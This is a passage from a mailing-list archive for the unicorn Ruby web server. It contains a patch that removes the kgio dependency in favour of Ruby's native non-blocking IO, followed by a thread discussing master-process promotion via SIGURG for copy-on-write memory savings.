+        # keep looping, more signals may be queued
+      else
+        raise TypeError, "Unexpected read_nonblock returns: #{buf.inspect}"
+      end
+    end # loop, as multiple signals may be sent
    end

    # worker objects may be compared to just plain Integers
diff --git a/t/oob_gc.ru b/t/oob_gc.ru
index c253540..43c0f68 100644
--- a/t/oob_gc.ru
+++ b/t/oob_gc.ru
@@ -7,7 +7,7 @@

  # Mock GC.start
  def GC.start
-  ObjectSpace.each_object(Kgio::Socket) do |x|
+  ObjectSpace.each_object(Socket) do |x|
      x.closed? or abort "not closed #{x}"
    end
    $gc_started = true
diff --git a/t/oob_gc_path.ru b/t/oob_gc_path.ru
index af8e3b9..e772261 100644
--- a/t/oob_gc_path.ru
+++ b/t/oob_gc_path.ru
@@ -7,7 +7,7 @@

  # Mock GC.start
  def GC.start
-  ObjectSpace.each_object(Kgio::Socket) do |x|
+  ObjectSpace.each_object(Socket) do |x|
      x.closed? or abort "not closed #{x}"
    end
    $gc_started = true
diff --git a/test/unit/test_request.rb b/test/unit/test_request.rb
index 6cb0268..a951057 100644
--- a/test/unit/test_request.rb
+++ b/test/unit/test_request.rb
@@ -11,11 +11,8 @@
  class RequestTest < Test::Unit::TestCase

    class MockRequest < StringIO
-    alias_method :readpartial, :sysread
-    alias_method :kgio_read!, :sysread
-    alias_method :read_nonblock, :sysread
-    def kgio_addr
-      '127.0.0.1'
+    def remote_address
+      Addrinfo.tcp('127.0.0.1', 55608)
      end
    end

@@ -152,14 +149,7 @@ def test_rack_lint_big_put
      buf = (' ' * bs).freeze
      length = bs * count
      client = Tempfile.new('big_put')
-    def client.kgio_addr; '127.0.0.1'; end
-    def client.kgio_read(*args)
-      readpartial(*args)
-    rescue EOFError
-    end
-    def client.kgio_read!(*args)
-      readpartial(*args)
-    end
+    def client.remote_address; Addrinfo.tcp('127.0.0.1', 55608); end
      client.syswrite(
        "PUT / HTTP/1.1\r\n" \
        "Host: foo\r\n" \
diff --git a/test/unit/test_stream_input.rb b/test/unit/test_stream_input.rb
index 1a07ec3..445b415 100644
--- a/test/unit/test_stream_input.rb
+++ b/test/unit/test_stream_input.rb
@@ -6,16 +6,14 @@

  class TestStreamInput < Test::Unit::TestCase
    def setup
-    @rs = $/
      @env = {}
-    @rd, @wr = Kgio::UNIXSocket.pair
+    @rd, @wr = UNIXSocket.pair
      @rd.sync = @wr.sync = true
      @start_pid = $$
    end

    def teardown
      return if $$ != @start_pid
-    $/ = @rs
      @rd.close rescue nil
      @wr.close rescue nil
      Process.waitall
@@ -54,10 +52,9 @@ def test_gets_multiline
    end

    def test_gets_empty_rs
-    $/ = nil
      r = init_request("a\nb\n\n")
      si = Unicorn::StreamInput.new(@rd, r)
-    assert_equal "a\nb\n\n", si.gets
+    assert_equal "a\nb\n\n", si.gets(nil)
      assert_nil si.gets
    end

diff --git a/test/unit/test_tee_input.rb b/test/unit/test_tee_input.rb
index 4647e66..21b90f1 100644
--- a/test/unit/test_tee_input.rb
+++ b/test/unit/test_tee_input.rb
@@ -12,7 +12,7 @@ class TestTeeInput < Test::Unit::TestCase

    def setup
      @rs = $/
-    @rd, @wr = Kgio::UNIXSocket.pair
+    @rd, @wr = UNIXSocket.pair
      @rd.sync = @wr.sync = true
      @start_pid = $$
    end
diff --git a/unicorn.gemspec b/unicorn.gemspec
index 7bb1154..85183d9 100644
--- a/unicorn.gemspec
+++ b/unicorn.gemspec
@@ -36,7 +36,6 @@
    # won't have descriptive text, only the numeric status.
    s.add_development_dependency(%q<rack>)

-  s.add_dependency(%q<kgio>, '~> 2.6')
    s.add_dependency(%q<raindrops>, '~> 0.7')

    s.add_development_dependency('test-unit', '~> 3.0')
-- 
2.35.1

[-- Attachment #2: 0001-Get-rid-of-Kgio.patch --]
[-- Type: text/plain, Size: 15534 bytes --]

From d0412e7305d7b6b4abc64996119e5722709bb6b0 Mon Sep 17 00:00:00 2001
From: Jean Boussier <jean.boussier@gmail.com>
Date: Fri, 8 Jul 2022 12:58:25 +0200
Subject: [PATCH] Get rid of Kgio

As discussed kgio is no longer absolutely necessary.

We can use Ruby 2+ non blocking IO capabilities instead.
---
 lib/unicorn.rb                 |  3 +--
 lib/unicorn/http_request.rb    | 15 +++++++++-----
 lib/unicorn/http_server.rb     | 33 +++++++++++++++++++++--------
 lib/unicorn/socket_helper.rb   | 20 ++++--------------
 lib/unicorn/stream_input.rb    | 16 ++++++++------
 lib/unicorn/worker.rb          | 38 ++++++++++++++++++++++------------
 t/oob_gc.ru                    |  2 +-
 t/oob_gc_path.ru               |  2 +-
 test/unit/test_request.rb      | 16 +++-----------
 test/unit/test_stream_input.rb |  7 ++-----
 test/unit/test_tee_input.rb    |  2 +-
 unicorn.gemspec                |  1 -
 12 files changed, 82 insertions(+), 73 deletions(-)

diff --git a/lib/unicorn.rb b/lib/unicorn.rb
index 1a50631..170719c 100644
--- a/lib/unicorn.rb
+++ b/lib/unicorn.rb
@@ -1,7 +1,6 @@
 # -*- encoding: binary -*-
 require 'etc'
 require 'stringio'
-require 'kgio'
 require 'raindrops'
 require 'io/wait'
 
@@ -113,7 +112,7 @@ def self.log_error(logger, prefix, exc)
   F_SETPIPE_SZ = 1031 if RUBY_PLATFORM =~ /linux/
 
   def self.pipe # :nodoc:
-    Kgio::Pipe.new.each do |io|
+    IO.pipe.each do |io|
       # shrink pipes to minimize impact on /proc/sys/fs/pipe-user-pages-soft
       # limits.
       if defined?(F_SETPIPE_SZ)
diff --git a/lib/unicorn/http_request.rb b/lib/unicorn/http_request.rb
index e3ad592..7f7324b 100644
--- a/lib/unicorn/http_request.rb
+++ b/lib/unicorn/http_request.rb
@@ -71,14 +71,19 @@ def read(socket)
     #  identify the client for the immediate request to the server;
     #  that client may be a proxy, gateway, or other intermediary
     #  acting on behalf of the actual source client."
-    e['REMOTE_ADDR'] = socket.kgio_addr
+    address = socket.remote_address
+    e['REMOTE_ADDR'] = if address.unix?
+      "127.0.0.1"
+    else
+      address.ip_address
+    end
 
     # short circuit the common case with small GET requests first
-    socket.kgio_read!(16384, buf)
+    socket.readpartial(16384, buf)
     if parse.nil?
       # Parser is not done, queue up more data to read and continue parsing
       # an Exception thrown from the parser will throw us out of the loop
-      false until add_parse(socket.kgio_read!(16384))
+      false until add_parse(socket.readpartial(16384))
     end
 
     check_client_connection(socket) if @@check_client_connection
@@ -108,7 +113,7 @@ def hijacked?
     TCPI = Raindrops::TCP_Info.allocate
 
     def check_client_connection(socket) # :nodoc:
-      if Unicorn::TCPClient === socket
+      if TCPSocket === socket
         # Raindrops::TCP_Info#get!, #state (reads struct tcp_info#tcpi_state)
         raise Errno::EPIPE, "client closed connection".freeze,
               EMPTY_ARRAY if closed_state?(TCPI.get!(socket).state)
@@ -153,7 +158,7 @@ def closed_state?(state) # :nodoc:
     # Not that efficient, but probably still better than doing unnecessary
     # work after a client gives up.
     def check_client_connection(socket) # :nodoc:
-      if Unicorn::TCPClient === socket && @@tcpi_inspect_ok
+      if TCPSocket === socket && @@tcpi_inspect_ok
         opt = socket.getsockopt(Socket::IPPROTO_TCP, Socket::TCP_INFO).inspect
         if opt =~ /\bstate=(\S+)/
           raise Errno::EPIPE, "client closed connection".freeze,
diff --git a/lib/unicorn/http_server.rb b/lib/unicorn/http_server.rb
index 21f2a05..98cd119 100644
--- a/lib/unicorn/http_server.rb
+++ b/lib/unicorn/http_server.rb
@@ -111,7 +111,7 @@ def initialize(app, options = {})
     @worker_data = if worker_data = ENV['UNICORN_WORKER']
       worker_data = worker_data.split(',').map!(&:to_i)
       worker_data[1] = worker_data.slice!(1..2).map do |i|
-        Kgio::Pipe.for_fd(i)
+        IO.for_fd(i)
       end
       worker_data
     end
@@ -240,7 +240,7 @@ def listen(address, opt = {}.merge(listener_opts[address] || {}))
     tries = opt[:tries] || 5
     begin
       io = bind_listen(address, opt)
-      unless Kgio::TCPServer === io || Kgio::UNIXServer === io
+      unless TCPServer === io || UNIXServer === io
         io.autoclose = false
         io = server_cast(io)
       end
@@ -386,12 +386,18 @@ def master_sleep(sec)
     # the Ruby itself and not require a separate malloc (on 32-bit MRI 1.9+).
     # Most reads are only one byte here and uncommon, so it's not worth a
     # persistent buffer, either:
-    @self_pipe[0].kgio_tryread(11)
+    begin
+      @self_pipe[0].read_nonblock(11)
+    rescue Errno::EAGAIN
+    end
   end
 
   def awaken_master
     return if $$ != @master_pid
-    @self_pipe[1].kgio_trywrite('.') # wakeup master process from select
+    begin
+      @self_pipe[1].write_nonblock('.') # wakeup master process from select
+    rescue Errno::EAGAIN
+    end
   end
 
   # reaps all unreaped workers
@@ -581,7 +587,10 @@ def handle_error(client, e)
       500
     end
     if code
-      client.kgio_trywrite(err_response(code, @request.response_start_sent))
+      begin
+        client.write_nonblock(err_response(code, @request.response_start_sent))
+      rescue Errno::EAGAIN
+      end
     end
     client.close
   rescue
@@ -733,9 +742,15 @@ def worker_loop(worker)
       reopen = reopen_worker_logs(worker.nr) if reopen
       worker.tick = time_now.to_i
       while sock = ready.shift
-        # Unicorn::Worker#kgio_tryaccept is not like accept(2) at all,
+        # Unicorn::Worker#accept_nonblock is not like accept(2) at all,
         # but that will return false
-        if client = sock.kgio_tryaccept
+        client = begin
+          sock.accept_nonblock
+        rescue Errno::EAGAIN
+          false
+        end
+
+        if client
           process_client(client)
           worker.tick = time_now.to_i
         end
@@ -834,7 +849,7 @@ def redirect_io(io, path)
 
   def inherit_listeners!
     # inherit sockets from parents, they need to be plain Socket objects
-    # before they become Kgio::UNIXServer or Kgio::TCPServer
+    # before they become UNIXServer or TCPServer
     inherited = ENV['UNICORN_FD'].to_s.split(',')
 
     # emulate sd_listen_fds() for systemd
@@ -858,7 +873,7 @@ def inherit_listeners!
     LISTENERS.replace(inherited)
 
     # we start out with generic Socket objects that get cast to either
-    # Kgio::TCPServer or Kgio::UNIXServer objects; but since the Socket
+    # TCPServer or UNIXServer objects; but since the Socket
     # objects share the same OS-level file descriptor as the higher-level
     # *Server objects; we need to prevent Socket objects from being
     # garbage-collected
diff --git a/lib/unicorn/socket_helper.rb b/lib/unicorn/socket_helper.rb
index 8a6f6ee..9d2ba52 100644
--- a/lib/unicorn/socket_helper.rb
+++ b/lib/unicorn/socket_helper.rb
@@ -3,18 +3,6 @@
 require 'socket'
 
 module Unicorn
-
-  # Instead of using a generic Kgio::Socket for everything,
-  # tag TCP sockets so we can use TCP_INFO under Linux without
-  # incurring extra syscalls for Unix domain sockets.
-  # TODO: remove these when we remove kgio
-  TCPClient = Class.new(Kgio::Socket) # :nodoc:
-  class TCPSrv < Kgio::TCPServer # :nodoc:
-    def kgio_tryaccept # :nodoc:
-      super(TCPClient)
-    end
-  end
-
   module SocketHelper
 
     # internal interface
@@ -135,7 +123,7 @@ def bind_listen(address = '0.0.0.0:8080', opt = {})
         end
         old_umask = File.umask(opt[:umask] || 0)
         begin
-          Kgio::UNIXServer.new(address)
+          UNIXServer.new(address)
         ensure
           File.umask(old_umask)
         end
@@ -164,7 +152,7 @@ def new_tcp_server(addr, port, opt)
       end
       sock.bind(Socket.pack_sockaddr_in(port, addr))
       sock.autoclose = false
-      TCPSrv.for_fd(sock.fileno)
+      TCPServer.for_fd(sock.fileno)
     end
 
     # returns rfc2732-style (e.g. "[::1]:666") addresses for IPv6
@@ -201,9 +189,9 @@ def sock_name(sock)
     def server_cast(sock)
       begin
         Socket.unpack_sockaddr_in(sock.getsockname)
-        TCPSrv.for_fd(sock.fileno)
+        TCPServer.for_fd(sock.fileno)
       rescue ArgumentError
-        Kgio::UNIXServer.for_fd(sock.fileno)
+        UNIXServer.for_fd(sock.fileno)
       end
     end
 
diff --git a/lib/unicorn/stream_input.rb b/lib/unicorn/stream_input.rb
index 41d28a0..3241ff4 100644
--- a/lib/unicorn/stream_input.rb
+++ b/lib/unicorn/stream_input.rb
@@ -1,3 +1,4 @@
+
 # -*- encoding: binary -*-
 
 # When processing uploads, unicorn may expose a StreamInput object under
@@ -49,7 +50,11 @@ def read(length = nil, rv = '')
         to_read = length - @rbuf.size
         rv.replace(@rbuf.slice!(0, @rbuf.size))
         until to_read == 0 || eof? || (rv.size > 0 && @chunked)
-          @socket.kgio_read(to_read, @buf) or eof!
+          begin
+            @socket.readpartial(to_read, @buf)
+          rescue EOFError
+            eof!
+          end
           filter_body(@rbuf, @buf)
           rv << @rbuf
           to_read -= @rbuf.size
@@ -72,8 +77,7 @@ def read(length = nil, rv = '')
   # Returns nil if called at the end of file.
   # This takes zero arguments for strict Rack::Lint compatibility,
   # unlike IO#gets.
-  def gets
-    sep = $/
+  def gets(sep = $/)
     if sep.nil?
       read_all(rv = '')
       return rv.empty? ? nil : rv
@@ -83,7 +87,7 @@ def gets
     begin
       @rbuf.sub!(re, '') and return $1
       return @rbuf.empty? ? nil : @rbuf.slice!(0, @rbuf.size) if eof?
-      @socket.kgio_read(@@io_chunk_size, @buf) or eof!
+      @socket.readpartial(@@io_chunk_size, @buf) or eof!
       filter_body(once = '', @buf)
       @rbuf << once
     end while true
@@ -107,7 +111,7 @@ def each
   def eof?
     if @parser.body_eof?
       while @chunked && ! @parser.parse
-        once = @socket.kgio_read(@@io_chunk_size) or eof!
+        once = @socket.readpartial(@@io_chunk_size) or eof!
         @buf << once
       end
       @socket = nil
@@ -127,7 +131,7 @@ def read_all(dst)
     dst.replace(@rbuf)
     @socket or return
     until eof?
-      @socket.kgio_read(@@io_chunk_size, @buf) or eof!
+      @socket.readpartial(@@io_chunk_size, @buf) or eof!
       filter_body(@rbuf, @buf)
       dst << @rbuf
     end
diff --git a/lib/unicorn/worker.rb b/lib/unicorn/worker.rb
index 5ddf379..fe741c0 100644
--- a/lib/unicorn/worker.rb
+++ b/lib/unicorn/worker.rb
@@ -63,27 +63,39 @@ def soft_kill(sig) # :nodoc:
       signum = Signal.list[sig.to_s] or
           raise ArgumentError, "BUG: bad signal: #{sig.inspect}"
     end
+
     # writing and reading 4 bytes on a pipe is atomic on all POSIX platforms
     # Do not care in the odd case the buffer is full, here.
-    @master.kgio_trywrite([signum].pack('l'))
+    begin
+      @master.write_nonblock([signum].pack('l'))
+    rescue Errno::EAGAIN
+    end
   rescue Errno::EPIPE
     # worker will be reaped soon
   end
 
   # this only runs when the Rack app.call is not running
   # act like a listener
-  def kgio_tryaccept # :nodoc:
-    case buf = @to_io.kgio_tryread(4)
-    when String
-      # unpack the buffer and trigger the signal handler
-      signum = buf.unpack('l')
-      fake_sig(signum[0])
-      # keep looping, more signals may be queued
-    when nil # EOF: master died, but we are at a safe place to exit
-      fake_sig(:QUIT)
-    when :wait_readable # keep waiting
-      return false
-    end while true # loop, as multiple signals may be sent
+  def accept_nonblock # :nodoc:
+    loop do
+      buf = begin
+        @to_io.read_nonblock(4)
+      rescue Errno::EAGAIN # keep waiting
+        return false
+      rescue EOFError # master died, but we are at a safe place to exit
+        fake_sig(:QUIT)
+      end
+
+      case buf
+      when String
+        # unpack the buffer and trigger the signal handler
+        signum = buf.unpack('l')
+        fake_sig(signum[0])
+        # keep looping, more signals may be queued
+      else
+        raise TypeError, "Unexpected read_nonblock returns: #{buf.inspect}"
+      end
+    end # loop, as multiple signals may be sent
   end
 
   # worker objects may be compared to just plain Integers
diff --git a/t/oob_gc.ru b/t/oob_gc.ru
index c253540..43c0f68 100644
--- a/t/oob_gc.ru
+++ b/t/oob_gc.ru
@@ -7,7 +7,7 @@
 
 # Mock GC.start
 def GC.start
-  ObjectSpace.each_object(Kgio::Socket) do |x|
+  ObjectSpace.each_object(Socket) do |x|
     x.closed? or abort "not closed #{x}"
   end
   $gc_started = true
diff --git a/t/oob_gc_path.ru b/t/oob_gc_path.ru
index af8e3b9..e772261 100644
--- a/t/oob_gc_path.ru
+++ b/t/oob_gc_path.ru
@@ -7,7 +7,7 @@
 
 # Mock GC.start
 def GC.start
-  ObjectSpace.each_object(Kgio::Socket) do |x|
+  ObjectSpace.each_object(Socket) do |x|
     x.closed? or abort "not closed #{x}"
   end
   $gc_started = true
diff --git a/test/unit/test_request.rb b/test/unit/test_request.rb
index 6cb0268..a951057 100644
--- a/test/unit/test_request.rb
+++ b/test/unit/test_request.rb
@@ -11,11 +11,8 @@
 class RequestTest < Test::Unit::TestCase
 
   class MockRequest < StringIO
-    alias_method :readpartial, :sysread
-    alias_method :kgio_read!, :sysread
-    alias_method :read_nonblock, :sysread
-    def kgio_addr
-      '127.0.0.1'
+    def remote_address
+      Addrinfo.tcp('127.0.0.1', 55608)
     end
   end
 
@@ -152,14 +149,7 @@ def test_rack_lint_big_put
     buf = (' ' * bs).freeze
     length = bs * count
     client = Tempfile.new('big_put')
-    def client.kgio_addr; '127.0.0.1'; end
-    def client.kgio_read(*args)
-      readpartial(*args)
-    rescue EOFError
-    end
-    def client.kgio_read!(*args)
-      readpartial(*args)
-    end
+    def client.remote_address; Addrinfo.tcp('127.0.0.1', 55608); end
     client.syswrite(
       "PUT / HTTP/1.1\r\n" \
       "Host: foo\r\n" \
diff --git a/test/unit/test_stream_input.rb b/test/unit/test_stream_input.rb
index 1a07ec3..445b415 100644
--- a/test/unit/test_stream_input.rb
+++ b/test/unit/test_stream_input.rb
@@ -6,16 +6,14 @@
 
 class TestStreamInput < Test::Unit::TestCase
   def setup
-    @rs = $/
     @env = {}
-    @rd, @wr = Kgio::UNIXSocket.pair
+    @rd, @wr = UNIXSocket.pair
     @rd.sync = @wr.sync = true
     @start_pid = $$
   end
 
   def teardown
     return if $$ != @start_pid
-    $/ = @rs
     @rd.close rescue nil
     @wr.close rescue nil
     Process.waitall
@@ -54,10 +52,9 @@ def test_gets_multiline
   end
 
   def test_gets_empty_rs
-    $/ = nil
     r = init_request("a\nb\n\n")
     si = Unicorn::StreamInput.new(@rd, r)
-    assert_equal "a\nb\n\n", si.gets
+    assert_equal "a\nb\n\n", si.gets(nil)
     assert_nil si.gets
   end
 
diff --git a/test/unit/test_tee_input.rb b/test/unit/test_tee_input.rb
index 4647e66..21b90f1 100644
--- a/test/unit/test_tee_input.rb
+++ b/test/unit/test_tee_input.rb
@@ -12,7 +12,7 @@ class TestTeeInput < Test::Unit::TestCase
 
   def setup
     @rs = $/
-    @rd, @wr = Kgio::UNIXSocket.pair
+    @rd, @wr = UNIXSocket.pair
     @rd.sync = @wr.sync = true
     @start_pid = $$
   end
diff --git a/unicorn.gemspec b/unicorn.gemspec
index 7bb1154..85183d9 100644
--- a/unicorn.gemspec
+++ b/unicorn.gemspec
@@ -36,7 +36,6 @@
   # won't have descriptive text, only the numeric status.
   s.add_development_dependency(%q<rack>)
 
-  s.add_dependency(%q<kgio>, '~> 2.6')
   s.add_dependency(%q<raindrops>, '~> 0.7')
 
   s.add_development_dependency('test-unit', '~> 3.0')
-- 
2.35.1


^ permalink raw reply related	[relevance 2%]

* Re: [PATCH] Master promotion with SIGURG (CoW optimization)
  @ 2022-07-08  6:22  2%           ` Jean Boussier
  2022-09-21 22:16  0%             ` Eric Wong
  0 siblings, 1 reply; 200+ results
From: Jean Boussier @ 2022-07-08  6:22 UTC (permalink / raw)
  To: Eric Wong; +Cc: unicorn-public

> (fully quoting original message for archival purposes, original
> was sent privately)

Sorry for this. Again our company laptops got locked down recently
and now I'm just struggling with shitty mail clients I don't know how to use.


> I don't think Ruby 2.3+ is even necessary, just yet, nor kgio.
> None of these new code paths should be exception-intensive to be
> a performance problem.

True.


> > If anything, the reliable timeout is the number one reason why I still
> > believe unicorn
> > is the superior server out there.
>
> /me hides under a desk :<
>
> Honestly, you have no idea how embarrased I am of that (mis)feature.

It's a bit off topic, but really you shouldn't. A proper timeout mechanism
is absolutely essential to ensure resiliency of the service.

Unless your app is really trivial, it's pretty much impossible to ensure
that all your endpoints will always complete in a reasonable amount
of time, even more so when you have malicious actors trying to DOS
you, or some bugs in database clients and such.

Killing these stuck workers allows to keep the service healthy until the
problem is fixed. The only thing we changed is that we first send SIGTERM
so that we can report the backtrace and other debug data.

> send pipes or any other IO objects across.

Oh, that's what I missed, that makes sense. I'll try the C wrapper
to send both the message and the IO at the same time.

Thanks again, I'll likely get back to you next week with a patch.

^ permalink raw reply	[relevance 2%]

* Re: [PATCH] Master promotion with SIGURG (CoW optimization)
  2022-07-06  7:40  1%   ` Jean Boussier
@ 2022-07-07 10:23  0%     ` Eric Wong
       [not found]           ` <CANPRWbHTNiEcYq5qhN6Kio8Wg9a+2gXmc2bAcB2oVw4LZv8rcw@mail.gmail.com>
  0 siblings, 1 reply; 200+ results
From: Eric Wong @ 2022-07-07 10:23 UTC (permalink / raw)
  To: Jean Boussier; +Cc: unicorn-public

Jean Boussier <jean.boussier@shopify.com> wrote:
> > OK, any numbers from Puma users which can be used to project
> > improvements for unicorn (and other servers)?
> 
> There are some user reports here: https://github.com/puma/puma/issues/2258
> but they are mixed in reports for two other new featurs.
> 
> Some reports are up to 20-30% savings, but I'd expect unicorn to benefit
> even more from it, given that typical puma users spawn less processes
> than with unicorn.

OK, those numbers sound very good (but I can't view
graphics/screenshots from w3m)

> > > They also include automatic reforking after a predetermined amount
> > > of requests (1k by default).
> >
> > 1k seems like a lot of requests (more on this below)
> 
> Agreed. Shared pages start being invalidated much faster than that.
> 
> > > - master: on `SIGURG`
> > >   - Forward `SIGURG` to a chosen worker.
> >
> > OK, I guess SIGURG is safe to use since nobody else relies on it (right?).
> 
> That's my understanding, an alternative could be to re-use USR2 and have a
> config flag to define wether it is a rexec or refork.

SIGURG is fine, having SIGUSR2 mean two things seems fragile and error-prone

> > Right.  PID file races and corner cases were painful to deal
> > with in the earliest days of this project, and I don't look
> > forward to having to deal with them ever again...
> >
> > It looked like the world was moving towards socket-activation
> > with dedicated process managers and away from fragile PID files;
> > so being self-daemonization dependent seems like a step back.
> 
> Agreed. We're currently running unicorn as PID 1 inside containers
> and I'm not exactly looking forward to have to minitor a PID file.
> 
> Another avenue I explored was to keep the existing master and
> refork from one of the worker like puma, but re-assign the parent
> to the orignal master using PR_SET_CHILD_SUBREAPER.
> 
> Here's my notes of how it works:
> 
> ### Requirements:
> 
> - Need `PR_SET_CHILD_SUBREAPER`, so Linux 3.4+ only (May 2012)

I'm fine with requiring Linux for this feature, existing
features need to continue working on *BSD...

> - Need `File.mkfifo`, so Ruby 2.3 (Dec 2015), but can be shimed for older
>   rubies.

I don't think it's necessary to use FIFOs at all (see below)

> ### Flow:
> 
> - master: set `PR_SET_CHILD_SUBREAPER` during boot.
> - master: create a temporary directory (`$TMP`).
> - master: spawn initial workers the old way.
> 
> - master: on `SIGCHLD` (a child died):
>   - Fake signal oldest worker (`SIGURG`).
>   - Write the new worker number in the fake signal pipe (at the same time).
> 
> - worker: on `SIGURG` (should spawn a sibling):
>   - Note: worker fake signals are processed after the current request is
>     completed.
>   - Run `before_fork` callback (MAYBE: need a special `before_refork`
>     callback?)
>   - create a pipe.
>   - daemonize (fork twice so that the new process is attributed to the
>     nearest `CHILD_SUBREAPER`, aka the original master).
>   - wait for the first child to exit.
>   - write into the pipe to signal the parent is dead.
>   - Run `after_fork` callback (MAYBE: need a special `after_refork` callback?)

*_fork callbacks already work for your current patch, though, right?;
so hopefully *_refork won't be needed...

> - new sibling after fork:
>   - wait for the parent to exit (though the temporary pipe).
>   - create a named pipe (`File.mkfifo`) at `$TMP/$WORKER_NUM.pipe`.
>   - create a pidfile at `$TMP/WORKER_NUM.pid`.
>   - Open the named pipe in `IO::RDONLY | IO::NONBLOCK` (otherwise it would
>     block until the master open in write mode).
>     - NB: Need to convert it to a `Kgio::Pipe` with
>       `Kgio::Pipe.for_fd(f.to_i)`, and keep `f` need `autoclose = false`.

sidenote: no need for kgio, I've been meaning to get rid of it
(Ruby 2.3+ has everything we'd need, I think...)

>   - Create the `Unicorn::Worker` instance with that pipe and worker number.
>   - Send `SIGURG` to the parent process (should be the master).
>   - Wait for `SIGCONT` in the named pipe.
>   - enter the worker loop.
> 
> - master: on `SIGURG`:
>   - for each outstanding refork order:
>     - Look for `$TMP/$WORKER_NUM.pid` and `$TMP/$WORKER_NUM.pipe`
>     - Read the pidfile
>     - Open the pipe with `IO::RDONLY | IO::NONBLOCK`
>       - NB: Need to convert it to a `Kgio::Pipe` with
>         `Kgio::Pipe.for_fd(f.to_i)`, and keep `f` need `autoclose = false`.
>     - Delete pidfile and named pipe.
>     - Register that new worker normally.
>     - Write `SIGCONT` into the pipe.
> 
> I can share the patch if you are interested, but the extra complexity
> and Linux only features made me prefer the master-promotion approach.

I would prefer this Linux-only approach if it gets rid of PID
files and doesn't introduce new temporary files/FIFOs.

It seems socketpair(..., SOCK_SEQPACKET) can be used for
packetized bidirectional IPC, perhaps with send_io + recv_io iff
necessary.  There shouldn't be any need for new, fragile FS
interactions.


Another idea, have you considered letting master work on some requests?
Signal handling would be delayed, and EINTR handling bugs in
gems could be exposed, but it'd be completely portable...

> > > However it work well enough for demonstration.
> > >
> > > So I figured I'd ask wether the feature is desired upstream
> > > before investing more effort into it.
> >
> > It really depends on:
> >
> > 1) what memory savings and/or speedups can be achieved
> >
> > 2) what support can we expect from you (and other users) for
> >    this feature and potential regressions going forward?
> >
> > I don't have the free time nor mental capacity to deal with
> > fallout from major new features such as this, myself.
> 
> Yeah, this is just a RFC, I wouldn't submit a final patch without
> first deploying it on our infra with good results. I'm just on the
> fence between trying to get this upstream vs maintaining our own
> server that solely work like this, hence somewhat simpler and that
> can make more assumptions.

Of course you also realize unicorn remains culturally-incompatible
with 99.9% of the open source world since I refuse to rely on
graphics drivers to work on a daemon, proprietary software,
terms-of-service, etc...

If anything goes wrong, I'd likely CC you anyways.

> > The hook interface would be yet another documentation+support
> > burden I'm worried about (and also more unicorn-specific stuff
> > to lock people in :<).
> 
> Understandable. I suppose it can be done with a monitoring process.
> Check `smaps_rollup` and send `SIGURG` when deemed necessary.
> 
> More moving pieces but keep unicorn simpler.

*shrug*  I've also been favoring more vertical integration in
other places to keep the overall stack simpler.

It depends on whether the monitoring process/library can work
with other Rack servers, probably; and signal compatibility.

> > A completely different idea which should achieve the same goal,
> > completely independent of unicorn:
> >
> >   App startup/loading can be made to trigger warmup paths which
> >   hit common endpoints.  IOW, app loading could run a small
> >   warmup suite which simulates common requests to heat up caches
> >   and trigger JIT.
> 
> Yeah, I don't really believe in this for a few reasons:
> 
>   - That would slow boot time.

Yes, and startup time is already a nasty thing, anyways...

>   - On large apps there's just too many codepath for this to be realistic.

I was thinking a lazy solution could be to have some middleware
measure coverage and log requests to support auto-replay, somehow.

>   - Many endpoints require database and other network access you probably
>     don't want in the master.

Wouldn't the *_fork hooks handle that, anyways?

>   - Endpoints may have side effects.

Yeah, this would optimize the GET endpoints, at least.
Not sure what percentage of POST needs to be optimized...

> > Ultimately (long-term for ruby-core), it would be better to make
> > JIT (and perhaps even VM cache) results persistent and shareable
> > across different processes, somehow...  That would help all Ruby
> > tools, even short-lived CLI tools.  Portable locking would be a
> > pain, I suppose, but proprietary OSes are always a pain :P
> 
> Based on my limited understanding of both JIT and VM caches, I don't think
> that's really possible.

Ugh, I still think it can be made possible, somehow.  But I no longer
use Ruby for new projects...

> The VM itself could definitely do better CoW wise, and I have some proposals
> on that front (https://bugs.ruby-lang.org/issues/18885) but that will take
> time and will never be perfect.
> 
> That's why I think periodically promoting a new master has potential.
> 
> > There's some line-wrapping issues caused by your MUA;
> 
> Urk. Ok, trying another client now, and I'll resend the patch.

Nope, still wrapped.  According to the git-format-patch(1) manpage,
Thunderbird can work w/o extensions, actually.

IME attachments might work mostly well, nowadays (test sending
to yourself and using "git am" to apply, first, of course).
Most on vger will disagree with me on attachments, though...

"git send-email" and "git imap-send" remain the recommended
options, but mutt works well, too.

> > Perhaps documenting this as experimental and subject to removal
> > at any time would make the addition of a major new feature an
> > easier pill to swallow; but I still think this is better outside
> > of app servers.
> 
> Up to you, if you don't feel like maintaining such a feature I would
> perfectly understand.

I'm fine with "maintaining it" if it just means Cc-ing you on
bugs related to this :>

^ permalink raw reply	[relevance 0%]

* Re: [PATCH] Master promotion with SIGURG (CoW optimization)
  2022-07-06  2:33  2% ` Eric Wong
@ 2022-07-06  7:40  1%   ` Jean Boussier
  2022-07-07 10:23  0%     ` Eric Wong
  0 siblings, 1 reply; 200+ results
From: Jean Boussier @ 2022-07-06  7:40 UTC (permalink / raw)
  Cc: unicorn-public

> OK, any numbers from Puma users which can be used to project
> improvements for unicorn (and other servers)?

There are some user reports here: https://github.com/puma/puma/issues/2258
but they are mixed in reports for two other new featurs.

Some reports are up to 20-30% savings, but I'd expect unicorn to benefit
even more from it, given that typical puma users spawn less processes
than with unicorn.

> > They also include automatic reforking after a predetermined amount
> > of requests (1k by default).
>
> 1k seems like a lot of requests (more on this below)

Agreed. Shared pages start being invalidated much faster than that.

> > - master: on `SIGURG`
> >   - Forward `SIGURG` to a chosen worker.
>
> OK, I guess SIGURG is safe to use since nobody else relies on it (right?).

That's my understanding, an alternative could be to re-use USR2 and have a
config flag to define wether it is a rexec or refork.

> Right.  PID file races and corner cases were painful to deal
> with in the earliest days of this project, and I don't look
> forward to having to deal with them ever again...
>
> It looked like the world was moving towards socket-activation
> with dedicated process managers and away from fragile PID files;
> so being self-daemonization dependent seems like a step back.

Agreed. We're currently running unicorn as PID 1 inside containers
and I'm not exactly looking forward to have to minitor a PID file.

Another avenue I explored was to keep the existing master and
refork from one of the worker like puma, but re-assign the parent
to the orignal master using PR_SET_CHILD_SUBREAPER.

Here's my notes of how it works:

### Requirements:

- Need `PR_SET_CHILD_SUBREAPER`, so Linux 3.4+ only (May 2012)
- Need `File.mkfifo`, so Ruby 2.3 (Dec 2015), but can be shimed for older
  rubies.

### Flow:

- master: set `PR_SET_CHILD_SUBREAPER` during boot.
- master: create a temporary directory (`$TMP`).
- master: spawn initial workers the old way.

- master: on `SIGCHLD` (a child died):
  - Fake signal oldest worker (`SIGURG`).
